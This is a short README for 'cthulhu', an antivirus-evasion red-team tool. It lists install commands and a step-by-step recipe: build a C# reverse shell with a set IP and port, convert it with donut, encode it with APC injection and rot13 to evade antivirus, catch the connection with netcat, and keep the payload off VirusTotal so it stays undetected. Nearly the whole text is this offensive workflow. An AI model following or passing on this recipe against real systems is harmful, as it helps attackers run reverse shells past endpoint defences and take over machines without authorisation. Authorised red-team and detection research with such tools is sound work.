cthulhu
AV Evasion, Red Team tool, a FourEye fork (by Leginbo https://github.com/lengjibo)
Install
git clone https://github.com/foxlox/cthulhu
cd cthulhu
chmod 755 setup.sh
./setup.sh
python3 cthulhu.py
Example
-
Create a new Visual Studio C# Console Project
-
Add reverse.cs and set IP and PORT
-
Build it
-
go to your Linux box
-
$ donut compiledapp.exe -o ca.bin
-
$ python3 cthulhu.py -method apc -arch x86 -bin ca.bin -enc rot13
=> [+]shellcode created: /tmp/shellcode.exe
-
Bind the right port with netcat on your linux box and wait.
-
Copy shellcode.exe on Windows box and run it. Don't remember to start your Antivirus.
-
Don't upload your shellcode.exe on Virustotal
*fox